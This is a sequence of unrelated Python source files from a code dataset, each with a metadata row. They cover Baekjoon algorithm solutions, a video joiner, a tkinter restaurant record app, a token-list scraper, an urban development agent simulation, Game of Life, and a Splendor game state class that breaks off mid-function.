board[i-1][j-1] = 1 # 사각형 영역의 값을 1로 설정
for row in board: # 행별로 값이 1인 부분의 갯수 카운트
answer += row.count(1)
print(answer) | unho-lee/TIL | CodeTest/Python/BaekJoon/2669.py | 2669.py | py | 658 | python | ko | code | 0 | github-code | 36 |
2938441206 | import sys
input=sys.stdin.readline
s=int(input())
n=1
while(1):
s1=(n*(n+1))/2
s2=((n+1)*(n+2))/2
if(s1 <= s < s2):
print(n)
break
n+=1
continue
| DoSeungJae/Baekjoon | Python/1789.py | 1789.py | py | 187 | python | en | code | 1 | github-code | 36 |
32829769716 | from collections import deque
# BFS 함수 정의
def bfs(sx, sy, ex, ey):
# 시작 지점이 목표 지점과 같은 경우, 함수 종료
if sx == ex and sy == ey:
return
queue = deque([(sx, sy)])
# 나이트가 움직일 수 있는 방향 벡터 정의
dx = [-2, -1, 1, 2, 2, 1, -1, -2]
dy = [1, 2, 2, 1, -1, -2, -2, -1]
while queue:
x, y = queue.popleft()
for d in range(8):
nx = x + dx[d]
ny = y + dy[d]
# 범위를 벗어나는 경우, 무시
if nx < 0 or nx >= i or ny < 0 or ny >= i:
continue
# 처음 도달하는 칸인 경우, 이동 횟수를 기록하고 해당 칸의 위치를 큐에 삽입
if graph[nx][ny] == 0:
queue.append((nx, ny))
graph[nx][ny] = graph[x][y] + 1
t = int(input())
# 테스트 케이스 수 만큼 반복
for _ in range(t):
i = int(input())
sx, sy = map(int, input().split()) # 나이트가 현재 있는 칸 입력 받기
ex, ey = map(int, input().split()) # 나이트가 이동하려고 하는 칸 입력 받기
graph = [[0] * i for _ in range(i)] # i X i 크기의 체스판 생성
# BFS 수행
bfs(sx, sy, ex, ey)
# 결과 출력
print(graph[ex][ey])
| veluminous/CodingTest | 백준 실전 문제/[백준 7562 DFS&BFS] 나이트의 이동.py | [백준 7562 DFS&BFS] 나이트의 이동.py | py | 1,306 | python | ko | code | 0 | github-code | 36 |
1298646891 | from moviepy.editor import *
import os
from natsort import natsorted
L =[]
for root, dirs, files in os.walk("D:\\Sujay\\German\\Best Way to Learn German Language-Full Beginner Course-A1.1\\New folder"):
#files.sort()
files = natsorted(files)
for file in files:
if os.path.splitext(file)[1] == '.mp4':
filePath = os.path.join(root, file)
video = VideoFileClip(filePath)
L.append(video)
final_clip = concatenate_videoclips(L)
final_clip.to_videofile("output.mp4", fps=24, remove_temp=False) | Sujay-Mhaske/Join-video | vid_join.py | vid_join.py | py | 565 | python | en | code | 1 | github-code | 36 |
35139998213 | from tkinter import *
from tkinter import messagebox, Entry
index=0
w=Tk()
w.title("Restaurant Management System")
count=0
def ok():
print("OK")
s1.set("OK")
def addrec():
f=open("mydata.txt","a")
n=s1.get()
a=s2.get()
b=s3.get()
c=s4.get()
d=s5.get()
for i in range(len(n),20):
n=n+" "
for i in range(len(a),20):
a=a+" "
for i in range(len(b),20):
b=b+" "
for i in range(len(c),20):
c=c+" "
for i in range(len(d),20):
d=d+" "
f.writelines(n+" "+a+" "+b+" "+c+" "+d+"\n")
f.close()
def nextrec():
file=open('mydata.txt','r')
global index
index=index+1
file.seek(index)
try:
c=file.readlines()
xyz = c[index]
l=list(xyz.split())
t1.delete(0,'end');t2.delete(0,'end');t3.delete(0,'end');t4.delete(0,'end');t5.delete(0,'end');
t1.insert(0,l[0]);t2.insert(0,l[1]);t3.insert(0,l[2]);t4.insert(0,l[3]);t5.insert(0,l[4]);
except:
messagebox.showinfo("Title", "")
file.close()
def prevrec():
file=open('mydata.txt','r')
global index
index=index-1
try:
file.seek(index)
c=file.readlines()
xyz = c[index]
l=list(xyz.split())
t1.delete(0,'end');t2.delete(0,'end');t3.delete(0,'end');t4.delete(0,'end');t5.delete(0,'end');
t1.insert(0,l[0]);t2.insert(0,l[1]);t3.insert(0,l[2]);t4.insert(0,l[3]);t5.insert(0,l[4]);
except:
messagebox.showinfo("Title", "no more records")
file.close()
def firstrec():
file=open('mydata.txt','r')
t1.delete(0,'end');t2.delete(0,'end');t3.delete(0,'end');t4.delete(0,'end');t5.delete(0,'end');
file.seek(0)
k=file.readline()
k=k.split()
t1.insert(0,k[0]);t2.insert(0,k[1]);t3.insert(0,k[2]);t4.insert(0,k[3]);t5.insert(0,k[4]);
file.close()
def updaterec():
file=open('mydata.txt','r')
lines=file.readlines()
file.close()
file=open('mydata.txt','w')
for line in lines:
com=line.split()
if com[0]==t1.get():
file.write(t1.get()+'\t'+t2.get()+'\t'+t3.get()+'\t'+t4.get()+'\t'+t5.get()+'\n')
messagebox.showinfo('Title','updated')
else:
file.write(line)
t1.delete(0,'end');t2.delete(0,'end');t3.delete(0,'end');t4.delete(0,'end');t5.delete(0,'end');
file.close()
def exitt():
w.destroy()
def deleterec():
f=open("mydata.txt","r")
lines = f.readlines()
f.close()
f = open("mydata.txt","w")
for line in lines:
com = line.split()
if com[0] != s4.get():
f.write(line)
messagebox.showinfo("Alert","Record Deleted!")
s5.delete(0,"end")
s4.delete(0,"end")
s3.delete(0,"end")
s2.delete(0,"end")
s1.delete(0,"end")
f.close()
def lastrec():
file=open('mydata.txt','r')
t1.delete(0,'end');t2.delete(0,'end');t3.delete(0,'end');t4.delete(0,'end');t5.delete(0,'end');
for i in file:
k=i
k=k.split()
t1.insert(0,k[0]);t2.insert(0,k[1]);t3.insert(0,k[2]);t4.insert(0,k[3]);t5.insert(0,k[4]);
file.close()
l1=Label(w,text="Food")
l2=Label(w,text="Drinks")
l3=Label(w,text="Total")
l4=Label(w,text="Reference")
l5=Label(w,text="Type")
s1=StringVar()
s2=StringVar()
s3=StringVar()
s4=StringVar()
s5=StringVar()
t1=Entry(w,textvariable=s1)
t2=Entry(w,textvariable=s2)
t3=Entry(w,textvariable=s3)
t4=Entry(w,textvariable=s4)
t5=Entry(w,textvariable=s5)
l1.grid(row=0,column=1)
l2.grid(row=1,column=1)
l3.grid(row=2,column=1)
l4.grid(row=3,column=1)
l5.grid(row=4,column=1)
t1.grid(row=0,column=2)
t2.grid(row=1,column=2)
t3.grid(row=2,column=2)
t4.grid(row=3,column=2)
t5.grid(row=4,column=2)
b1=Button(w,text="ADD",command=addrec)
b2=Button(w,text=">",command=nextrec)
b3=Button(w,text="EXIT",command=exitt)
b4=Button(w,text="LAST",command=lastrec)
b5=Button(w,text="<",command=prevrec)
b6=Button(w,text="FIRST",command=firstrec)
b7=Button(w,text="UPDATE",command=updaterec)
b8=Button(w,text="DELETE",command=deleterec)
b1.grid(row=5,column=1)
b2.grid(row=5,column=2)
b3.grid(row=5,column=3)
b4.grid(row=5,column=4)
b5.grid(row=6,column=1)
b6.grid(row=6,column=2)
b7.grid(row=6,column=3)
b8.grid(row=6,column=4)
w.mainloop()
| nitinagg4/RestaurantManagementSystemByNitin | project.py | project.py | py | 4,707 | python | en | code | 0 | github-code | 36 |
21052629609 | import requests
from bs4 import BeautifulSoup
import json
tokens = []
for x in range(1, 12):
result = requests.get("https://etherscan.io/tokens?p=" + str(x))
c = result.content
soup = BeautifulSoup(c, "html.parser")
samples = soup.find_all("tr")
for sample in samples:
try:
if ("token" in sample.find_all("td")[1].find("a")['href']):
tokens.append({"address": sample.find_all("td")[1].find("a")['href'].replace("/token/", ""), "image": sample.find_all("td")[1].find("img")['src'], "name": sample.find_all("td")[2].find("a").text})
except Exception as e:
continue
print(json.dumps(tokens)) | markchipman/inklin | get_tokens.py | get_tokens.py | py | 673 | python | en | code | 0 | github-code | 36 |
70719921064 | import numpy as np
from ..patch import Patch
from ..parcel import Parcel
class PropertyDeveloper:
def __init__(self, world, agent_type, view_radius=5, memory=100):
self.world = world
self.view_radius = view_radius
self.memory = memory
self.position = np.random.choice(world.patches.flatten()) # Starts in a random patch of the map
self.dev_sites = [] # TO DO: initialize dev_sites using starting position
self.dev_patches = []
self.considered_patches = []
self.agent_type = agent_type
# Weights for each type of developer
## eh ev epv dw dr di dpk dpr dm x
self.W = {
"r": [.1, .2, 0, .1, .4, 0, 0, .2, 0, 0],
"c": [ 0, .2, 0, .15, .15, 0, 0, 0, .4, 0],
"i": [ 0, .5, 0, .3, 0, .1, 0, .1, 0, 0],
"p": [ 0, 0, .2, .1, .1, 0, .4, 0, 0, .2]
}
def getRegion(self, i, j):
region = self.world.patches[max(1,i-self.view_radius):i+self.view_radius, # Adding padding of 1 patch
max(1, j-self.view_radius):j+self.view_radius].flatten()
region = [p for p in region if p.developable] # Selecting only developable patches (excludes water, etc)
region_parcels = []
region_patches = []
for patch in region:
if (patch.parcel == None):
region_patches.append(patch)
elif ( patch.parcel not in region_parcels and patch.parcel.development_type != self.agent_type): # Excludes parcels of same development type as the agent (TO DO: provisory)
region_parcels.append(patch.parcel)
return region_patches, region_parcels
# Searches for suitable locations in its surroundings
def prospect(self, dev_sites):
i, j = [self.position.i, self.position.j]
region_patches, region_parcels = self.getRegion(i, j)
patch_values, parcel_values = [self.world.patch_values, self.world.parcel_values]
values = patch_values | parcel_values
combined_region = region_patches + region_parcels
if (len(dev_sites)!=0 and (self.last_commit>0 or self.last_relocate>0)): # Move to a seen location
combined_region = combined_region + dev_sites # Searching in union of region and memory
region_values = [values[p][self.agent_type] for p in combined_region]
next_location = combined_region[np.argmax(region_values)]
else: # Relocate globlally
self.last_relocate = 5 # Resets relocation counter
# Selecting all empty patches from the world
world_patches = [p for p in self.world.patches.flatten() if p.undeveloped and p.developable]
world_parcels = [p for p in self.world.parcels if p.development_type != self.agent_type] # TO DO: check if conversion to agent_type is possible
world_sites = world_patches + world_parcels
sorted_idx = np.argsort([values[p][self.agent_type] for p in world_sites])[::-1]
world_sites = np.array(world_sites)[sorted_idx]
# Move to a random site in the top 5 best for the agent
try:
next_location = np.random.choice(world_sites[:5])
except: # No more areas to develop
return []
self.dev_patches = []
self.position = next_location
#region_patches, region_parcels = self.getRegion() # NOTE: maybe have to be updated after relocation
# TO DO / NOTE : Check this implementation better later
dev_parcels = region_parcels
dev_patches = []
for patch in self.dev_patches + region_patches:
if patch not in dev_patches and patch.undeveloped:
dev_patches.append(patch)
dev_patches_sorted_idx = np.argsort([values[p][self.agent_type] for p in dev_patches])[::-1]
dev_patches = np.array(dev_patches)[dev_patches_sorted_idx]
self.dev_patches = list(dev_patches[:int(0.9*len(dev_patches))]) # Selecting only the 90% best patches
dev_sites = list(dev_patches) + dev_parcels
return dev_sites
# Returns True if as build successfully and False otherwise
def build(self, site):
if (isinstance(site, Patch)): # Building in patch is direct
self.considered_patches.append(site)
new_parcel = self.world.createParcel(site, development_type=self.agent_type) # TO DO: expand to create parcels of multiple patches
if (new_parcel == None):
return False
for patch in new_parcel.patches:
# Preventing roads to be built on top of this patch
self.world.addBlockedPatch(patch)
return True
return False
def getScore(self, patch):
i, j = [patch.i, patch.j]
region_patches, region_parcels = self.getRegion(i, j)
eh = patch.get_eh(self.world.patches)
ev, epv = patch.get_ev(self.world.patches)
dpr = patch.get_dpr()
dw = patch.get_dw()
dr = patch.get_dr(region_patches, region_parcels)
dc = patch.get_dc(region_patches, region_parcels)
di = patch.get_di(region_patches, region_parcels)
dm = patch.get_dm(self.world.parcels)
dpk = patch.get_dm(self.world.parcels)
A = [eh, ev, epv, dw, dr, di, dpk, dpr, dm, 0]
W = [self.W['r'], self.W['i'], self.W['i'], self.W['p']]
Vr, Vc, Vi, _= np.dot(W, A)
Vp = (1/Vr + 1/Vc + 1/Vi) * self.W['p'][-1] # Anti-worth
return {'Vr': Vr, 'Vc': Vc, 'Vi': Vi, 'Vp': Vp}
def prospectNew(self):
i, j = [self.position.i, self.position.j]
region_patches, region_parcels = self.getRegion(i, j)
avaliable_patches = self.dev_patches + region_patches # Memory + new
avaliable_patches = [p for p in avaliable_patches if p not in self.considered_patches and self.world.isAccessible(p)]
# No more avaliable patches, relocate globaly
while len(avaliable_patches) == 0:
self.position = np.random.choice(self.world.patches.flatten())
i, j = [self.position.i, self.position.j]
region_patches, region_parcels = self.getRegion(i, j)
avaliable_patches = [p for p in region_patches if p not in self.considered_patches and self.world.isAccessible(p)]
scores = [self.getScore(patch)[self.agent_type] for patch in avaliable_patches]
idx_best = np.argmax(scores)
best_patch = avaliable_patches[idx_best]
#print(f"Selected patch: ({best_patch.i}, {best_patch.j}), undeveloped={best_patch.undeveloped}")
if (self.position == best_patch):
self.build(self.position)
print("Building")
else:
self.position = best_patch
print("Relocating")
return avaliable_patches
def buildNew(self):
avaliable_patches = [p for p in self.world.patches.flatten() if p.developable and p.undeveloped and p not in self.considered_patches]
# Scoring all patches and sorting them by score
scores = [self.getScore(p)[self.agent_type] for p in avaliable_patches]
sorted_idx = np.argsort(scores)[::-1]
sorted_patches = np.array(avaliable_patches)[sorted_idx]
# Triyng to build in the best score avaliable
built = False
for patch in sorted_patches:
# Checks if a patch is accessible
if(self.build(patch)):
break
# Interacts with the environment
def interact(self):
self.dev_patches = self.prospectNew()
self.dev_patches = self.dev_patches[:min(len(self.dev_patches), self.memory)]
# Removing already developed patched from the list
self.dev_patches = [p for p in self.dev_patches if p.developable]
'''
self.build(self.position) # My version
#for site in self.dev_sites: # Paper implementation
# self.build(site)
# Decreases counters
self.last_commit -= 1
self.last_relocate -= 1
'''
#print(f"Current position: {self.position.i}, {self.position.j}") | LFRusso/strabo | strabo/agents/property.py | property.py | py | 8,249 | python | en | code | 0 | github-code | 36 |
40053694782 | import time
import random
def main():
rows = 20
cols = 50
max = rows * cols
c=220
d=700
m = [0] * max
n = [0] * max
print("\033[2J") # Clear screen
# Initialize arrays.
# for j in range(0, i):
# m[j] = 0
# n[j] = 0
# drop cells at random locations.
for j in range(0, d):
m[random.randint(0, max-1)] = 1
# While c generations...
while c > 0:
c -= 1
for i in range(51, 949):
# Count neighbors.
d = m[i-1] + m[i+1] + m[i-51] + m[i-50] + m[i-49] + m[i+49] + m[i+50] + m[i+51]
# Compute new state.
n[i] = m[i]
if m[i] == 0 and d == 3:
n[i] = 1
elif m[i] == 1 and d < 2:
n[i] = 0
elif m[i] == 1 and d > 3:
n[i] = 0
# Display results.
print("\033[1;1H") # Home cursor
print(c) # Countdown
for i in range(0, max): # Gridsize 50x20
if n[i] > 0:
print("O", end='')
else:
print(".", end='')
if (i+1) % 50 == 0:
print('') # Print new line.
# And new state to main array.
m[i] = n[i]
time.sleep(0.5)
main()
| mscottreynolds/cse210-06 | test/awk.py | awk.py | py | 1,328 | python | en | code | 0 | github-code | 36 |
22078953220 | from enum import Enum
import random
import copy
random.seed(None)
def setSeed(s):
random.seed(s)
"""
Basic enumerated class to specify colors when needed.
"""
class Color(Enum):
WHITE = 0
BLACK = 1
GREEN = 2
RED = 3
BLUE = 4
GOLD = 5
@classmethod
def mapToColor(self, color):
if (color == "W"):
return Color.WHITE
elif (color == "K"):
return Color.BLACK
elif (color == "E"):
return Color.GREEN
elif (color == "R"):
return Color.RED
elif (color == "B"):
return Color.BLUE
elif (color == "G"):
return Color.GOLD
else:
return None
def __str__(self):
s = ""
if self.value == 1:
s = "W"
elif self.value == 2:
s = "K"
elif self.value == 3:
s = "E"
elif self.value == 4:
s = "R"
elif self.value == 5:
s = "B"
elif self.value == 6:
s = "G"
return s
"""
Basic enumerated class to specify whether a player is a human or AI.
"""
class PlayerType(Enum):
HUMAN = 1
AI = 2
"""
A GemDict is a dictionary with Color keys and int values. Dictionary can be accessed through the getter.
"""
class GemDict:
def __init__(self, gem_lst):
self.data = {
Color.WHITE : gem_lst[0],
Color.BLACK : gem_lst[1],
Color.GREEN : gem_lst[2],
Color.RED : gem_lst[3],
Color.BLUE : gem_lst[4]}
def add(self, color, num):
if color == Color.WHITE:
self.data[Color.WHITE] += num
elif color == Color.BLACK:
self.data[Color.BLACK] += num
elif color == Color.GREEN:
self.data[Color.GREEN] += num
elif color == Color.RED:
self.data[Color.RED] += num
elif color == Color.BLUE:
self.data[Color.BLUE] += num
else:
raise ValueError
def remove(self, color, num):
if color == Color.WHITE:
self.data[Color.WHITE] -= num
elif color == Color.BLACK:
self.data[Color.BLACK] -= num
elif color == Color.GREEN:
self.data[Color.GREEN] -= num
elif color == Color.RED:
self.data[Color.RED] -= num
elif color == Color.BLUE:
self.data[Color.BLUE] -= num
else:
raise ValueError
def total_gems(self):
return (
self.data[Color.WHITE] +
self.data[Color.BLACK] +
self.data[Color.GREEN] +
self.data[Color.RED] +
self.data[Color.BLUE])
def get_data(self):
return self.data
def data_gui(self):
return [
self.data[Color.WHITE],
self.data[Color.BLACK],
self.data[Color.GREEN],
self.data[Color.RED],
self.data[Color.BLUE]]
def addGD(self, gd):
w = self.data_gui()[0] + gd.data_gui()[0]
k = self.data_gui()[1] + gd.data_gui()[1]
e = self.data_gui()[2] + gd.data_gui()[2]
r = self.data_gui()[3] + gd.data_gui()[3]
b = self.data_gui()[4] + gd.data_gui()[4]
return self.gdString(w,k,e,r,b)
def gdString(self,w,k,e,r,b):
return (str(w)+"|"+str(k)+"|"+str(e)+"|"+str(r)+"|"+str(b))
def __str__(self):
w = self.data_gui()[0]
k = self.data_gui()[1]
e = self.data_gui()[2]
r = self.data_gui()[3]
b = self.data_gui()[4]
return self.gdString(w,k,e,r,b)
"""
A State will contain:
current_player: A Player object of the player who's turn it currently is
players: A list of Player objects, in turn order, corresponding to each player in the game
tier1_deck: a list of Card objects that make up the remaining cards in the tier 1 deck
tier2_deck: a list of Card objects that make up the remaining cards in the tier 2 deck
tier3_deck: a list of Card objects that make up the remaining cards in the tier 3 deck
tier1: a list of Card objects that represent the tier 1 cards available for purchase
tier2: a list of Card objects that represent the tier 2 cards available for purchase
tier3: a list of Card objects that represent the tier 3 cards available for purchase
available_gems: a GemDict representing the number of gems available to take
gold: an int, the number of gold gems available to take
nobles: a list of GemDicts representing the nobles available for purchase (each noble is worth 3 points)
"""
class State:
"""
Sets up the initial state of the game with a randomized board and gems for the correct number of players.
"""
def __init__(self, num_human_players, num_AI_players):
self._players = []
for i in range(num_human_players):
self._players.append(Player(PlayerType.HUMAN, "HUMAN " + str(i)))
for j in range(num_AI_players):
self._players.append(Player(PlayerType.AI, "AI " + str(j)))
random.shuffle(self._players) #put players in random order
self._current_player = self._players[0] #set current player to first player in list
if num_AI_players+num_human_players == 2:
self._available_gems = GemDict([4,4,4,4,4])
elif num_human_players + num_human_players == 3:
self._available_gems = GemDict([5,5,5,5,5])
else:
self._available_gems = GemDict([7,7,7,7,7])
self._gold = 5
self._tier1_deck = self.gen_tier1()
self._tier2_deck = self.gen_tier2()
self._tier3_deck = self.gen_tier3()
random.shuffle(self._tier1_deck)
random.shuffle(self._tier2_deck)
random.shuffle(self._tier3_deck)
self._tier1 = self._tier1_deck[:4]
self._tier2 = self._tier2_deck[:4]
self._tier3 = self._tier3_deck[:4]
self._tier1_deck = self._tier1_deck[4:]
self._tier2_deck = self._tier2_deck[4:]
self._tier3_deck = self._tier3_deck[4:]
self._nobles = self.gen_nobles()
random.shuffle(self._nobles)
self._nobles = self._nobles[:(num_human_players+num_AI_players+1)] #num nobles available = num players + 1
self._turnCount = 1
self._discarding = False
self._firstWinner = None
self._winners = []
self._running = True
self._interactions = 0
"""Generates a shuffled deck of tier 1 cards."""
def gen_tier1(self):
tier1_deck = []
tier1_deck.append(Card(Color.BLACK, 0, [1, 0, 1, 1, 1], 1))
tier1_deck.append(Card(Color.BLACK, 0, [0, 0, 2, 1, 0], 1))
tier1_deck.append(Card(Color.BLACK, 0, [2, 0, 2, 0, 0], 1))
tier1_deck.append(Card(Color.BLACK, 0, [0, 1, 1, 3, 0], 1))
tier1_deck.append(Card(Color.BLACK, 0, [0, 0, 3, 0, 0], 1))
tier1_deck.append(Card(Color.BLACK, 0, [1, 0, 1, 1, 2], 1))
tier1_deck.append(Card(Color.BLACK, 0, [2, 0, 0, 1, 2], 1))
tier1_deck.append(Card(Color.BLACK, 1, [0, 0, 0, 0, 4], 1))
tier1_deck.append(Card(Color.BLUE, 0, [1, 2, 0, 0, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [1, 1, 1, 2, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [1, 1, 1, 1, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [0, 0, 3, 1, 1], 1))
tier1_deck.append(Card(Color.BLUE, 0, [0, 3, 0, 0, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [1, 0, 2, 2, 0], 1))
tier1_deck.append(Card(Color.BLUE, 0, [0, 2, 2, 0, 0], 1))
tier1_deck.append(Card(Color.BLUE, 1, [0, 0, 0, 4, 0], 1))
tier1_deck.append(Card(Color.GREEN, 0, [2, 0, 0, 0, 1], 1))
tier1_deck.append(Card(Color.GREEN, 0, [0, 0, 0, 2, 2], 1))
tier1_deck.append(Card(Color.GREEN, 0, [1, 0, 1, 0, 3], 1))
tier1_deck.append(Card(Color.GREEN, 0, [1, 1, 0, 1, 1], 1))
tier1_deck.append(Card(Color.GREEN, 0, [1, 1, 0, 1, 2], 1))
tier1_deck.append(Card(Color.GREEN, 0, [0, 2, 0, 2, 1], 1))
tier1_deck.append(Card(Color.GREEN, 0, [0, 0, 0, 3, 0], 1))
tier1_deck.append(Card(Color.GREEN, 1, [0, 4, 0, 0, 0], 1))
tier1_deck.append(Card(Color.RED, 0, [3, 0, 0, 0, 0], 1))
tier1_deck.append(Card(Color.RED, 0, [1, 3, 0, 1, 0], 1))
tier1_deck.append(Card(Color.RED, 0, [0, 0, 1, 0, 2], 1))
tier1_deck.append(Card(Color.RED, 0, [2, 2, 1, 0, 0], 1))
tier1_deck.append(Card(Color.RED, 0, [2, 1, 1, 0, 1], 1))
tier1_deck.append(Card(Color.RED, 0, [1, 1, 1, 0, 1], 1))
tier1_deck.append(Card(Color.RED, 0, [2, 0, 0, 2, 0], 1))
tier1_deck.append(Card(Color.RED, 1, [4, 0, 0, 0, 0], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 1, 2, 0, 2], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 1, 0, 2, 0], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 1, 1, 1, 1], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 0, 0, 0, 3], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 0, 2, 0, 2], 1))
tier1_deck.append(Card(Color.WHITE, 0, [0, 1, 2, 1, 1], 1))
tier1_deck.append(Card(Color.WHITE, 0, [3, 1, 0, 0, 1], 1))
tier1_deck.append(Card(Color.WHITE, 1, [0, 0, 4, 0, 0], 1))
return tier1_deck
"""Generates a shuffled deck of tier 2 cards."""
def gen_tier2(self):
tier2_deck = []
tier2_deck.append(Card(Color.BLACK, 1, [3, 0, 2, 0, 2], 2))
tier2_deck.append(Card(Color.BLACK, 1, [3, 2, 3, 0, 0], 2))
tier2_deck.append(Card(Color.BLACK, 2, [0, 0, 4, 2, 1], 2))
tier2_deck.append(Card(Color.BLACK, 2, [5, 0, 0, 0, 0], 2))
tier2_deck.append(Card(Color.BLACK, 2, [0, 0, 5, 3, 0], 2))
tier2_deck.append(Card(Color.BLACK, 3, [0, 6, 0, 0, 0], 2))
tier2_deck.append(Card(Color.BLUE, 1, [0, 0, 2, 3, 2], 2))
tier2_deck.append(Card(Color.BLUE, 1, [0, 3, 3, 0, 2], 2))
tier2_deck.append(Card(Color.BLUE, 2, [5, 0, 0, 0, 3], 2))
tier2_deck.append(Card(Color.BLUE, 2, [0, 0, 0, 0, 5], 2))
tier2_deck.append(Card(Color.BLUE, 2, [2, 4, 0, 1, 0], 2))
tier2_deck.append(Card(Color.BLUE, 3, [0, 0, 0, 0, 6], 2))
tier2_deck.append(Card(Color.GREEN, 1, [3, 0, 2, 3, 0], 2))
tier2_deck.append(Card(Color.GREEN, 1, [2, 2, 0, 0, 3], 2))
tier2_deck.append(Card(Color.GREEN, 2, [4, 1, 0, 0, 2], 2))
tier2_deck.append(Card(Color.GREEN, 2, [0, 0, 5, 0, 0], 2))
tier2_deck.append(Card(Color.GREEN, 2, [0, 0, 3, 0, 5], 2))
tier2_deck.append(Card(Color.GREEN, 3, [0, 0, 6, 0, 0], 2))
tier2_deck.append(Card(Color.RED, 1, [0, 3, 0, 2, 3], 2))
tier2_deck.append(Card(Color.RED, 1, [2, 3, 0, 2, 0], 2))
tier2_deck.append(Card(Color.RED, 2, [1, 0, 2, 0, 4], 2))
tier2_deck.append(Card(Color.RED, 2, [3, 5, 0, 0, 0], 2))
tier2_deck.append(Card(Color.RED, 2, [0, 5, 0, 0, 0], 2))
tier2_deck.append(Card(Color.RED, 3, [0, 0, 0, 6, 0], 2))
tier2_deck.append(Card(Color.WHITE, 1, [0, 2, 3, 2, 0], 2))
tier2_deck.append(Card(Color.WHITE, 1, [2, 0, 0, 3, 3], 2))
tier2_deck.append(Card(Color.WHITE, 2, [0, 2, 1, 4, 0], 2))
tier2_deck.append(Card(Color.WHITE, 2, [0, 0, 0, 5, 0], 2))
tier2_deck.append(Card(Color.WHITE, 2, [0, 3, 0, 5, 0], 2))
tier2_deck.append(Card(Color.WHITE, 3, [6, 0, 0, 0, 0], 2))
return tier2_deck
"""Generates a shuffled deck of tier 3 cards."""
def gen_tier3(self):
tier3_deck = []
tier3_deck.append(Card(Color.BLACK, 3, [3, 0, 5, 3, 3], 3))
tier3_deck.append(Card(Color.BLACK, 4, [0, 0, 0, 7, 0], 3))
tier3_deck.append(Card(Color.BLACK, 4, [0, 3, 3, 6, 0], 3))
tier3_deck.append(Card(Color.BLACK, 5, [0, 3, 0, 7, 0], 3))
tier3_deck.append(Card(Color.BLUE, 3, [3, 5, 3, 3, 0], 3))
tier3_deck.append(Card(Color.BLUE, 4, [7, 0, 0, 0, 0], 3))
tier3_deck.append(Card(Color.BLUE, 4, [6, 3, 0, 0, 3], 3))
tier3_deck.append(Card(Color.BLUE, 5, [7, 0, 0, 0, 3], 3))
tier3_deck.append(Card(Color.GREEN, 3, [5, 3, 0, 3, 3], 3))
tier3_deck.append(Card(Color.GREEN, 4, [3, 0, 3, 0, 6], 3))
tier3_deck.append(Card(Color.GREEN, 4, [0, 0, 0, 0, 7], 3))
tier3_deck.append(Card(Color.GREEN, 5, [0, 0, 3, 0, 7], 3))
tier3_deck.append(Card(Color.RED, 3, [3, 3, 3, 0, 5], 3))
tier3_deck.append(Card(Color.RED, 4, [0, 0, 7, 0, 0], 3))
tier3_deck.append(Card(Color.RED, 4, [0, 0, 6, 3, 3], 3))
tier3_deck.append(Card(Color.RED, 5, [0, 0, 7, 3, 0], 3))
tier3_deck.append(Card(Color.WHITE, 3, [0, 3, 3, 5, 3], 3))
tier3_deck.append(Card(Color.WHITE, 4, [0, 7, 0, 0, 0], 3))
tier3_deck.append(Card(Color.WHITE, 4, [3, 6, 0, 3, 0], 3))
tier3_deck.append(Card(Color.WHITE, 5, [3, 7, 0, 0, 0], 3))
return tier3_deck
def gen_nobles(self):
nobles = []
nobles.append(GemDict([0,0,4,4,0]))
nobles.append(GemDict([3,3,0,3,0]))
nobles.append(GemDict([4,0,0,0,4]))
nobles.append(GemDict([4,4,0,0,0]))
nobles.append(GemDict([0,0,4,0,4]))
nobles.append(GemDict([0,0,3,3,3]))
nobles.append(GemDict([3,0,3,0,3]))
nobles.append(GemDict([0,4,0,4,0]))
nobles.append(GemDict([3,3,0,0,3]))
nobles.append(GemDict([0,3,3,3,0]))
return nobles
"""
Returns whether the game has finished.
"""
def running(self):
return self._running
"""
Set _running to False.
"""
def endGame(self):
self._running = False
"""
Returns the turn count for the game.
"""
def get_turn_count(self):
return self._turnCount
"""
Returns a list of Player objects, in turn order, corresponding to each player in the game.
"""
def get_players(self):
return self._players
"""
Returns a Player object of the current player.
"""
def get_current_player(self):
return self._current_player
"""
Returns the remaining tier1 cards left in the deck as a list of Card objects.
"""
def get_tier1_deck(self):
return self._tier1_deck
"""
Returns the remaining tier2 cards left in the deck as a list of Card objects.
"""
def get_tier2_deck(self):
return self._tier2_deck
"""
Returns the remaining tier3 cards left in the deck as a list of Card objects.
"""
def get_tier3_deck(self):
return self._tier3_deck
"""
Returns the remaining tier1 cards currently on the board as a list of Card objects.
"""
def get_tier1(self):
return self._tier1
"""
Returns the remaining tier2 cards currently on the board as a list of Card objects.
"""
def get_tier2(self):
return self._tier2
"""
Returns the tier3 cards currently on the board as a list of Card objects.
"""
def get_tier3(self):
return self._tier3
"""
Returns the gems available to take as a GemDict object.
"""
def get_avail_gems(self):
return self._available_gems
"""
Returns int of the number of gold gems still available.
"""
def get_num_gold(self):
return self._gold
"""
Returns the nobles remaining on the board.
"""
def get_nobles(self):
return self._nobles
def getNoble(self, noble):
return self._nobles[noble]
def getPlayerReserved(self, player, card):
self._players[player].get_reserved()[card].reserve(card)
return self._players[player].get_reserved()[card]
"""
Returns the index of the current player in the order the players are in.
"""
def current_player_index(self):
return self._players.index(self._current_player)
"""
Changes the current player to the next player in the player list.
"""
def next_player(self):
current = self.current_player_index()
self._current_player = self._players[current+1-len(self._players)]
self._turnCount += 1
"""
Removes one card from the desired tier deck and adds it to the tier cards on the board.
tier: Int. The tier number whose deck a card should be removed from. Also the tier number
on the board that the card will be added to.
If tier = 1, remove from tier 1 deck. If tier = 2, remove from tier 2 deck.
If tier = 3, remove from tier 3 deck. Otherwise the method raises ValueError.
This method is called after a player purchases a card to replenish the cards on the board.
If there are no cards remaining in the desired tier deck, no card is added to the board.
"""
def draw_from_deck(self, tier):
if tier == 1:
if len(self._tier1_deck)!=0:
new_card = self._tier1_deck.pop()
self._tier1.append(new_card)
elif tier == 2:
if len(self._tier2_deck)!=0:
new_card = self._tier2_deck.pop()
self._tier2.append(new_card)
elif tier == 3:
if len(self._tier3_deck)!=0:
new_card = self._tier3_deck.pop()
self._tier3.append(new_card)
else:
raise ValueError
"""
Helper function that removes and returns the top card ot a specified tier deck.
"""
def reserve_from_deck(self, tier):
if tier == 1:
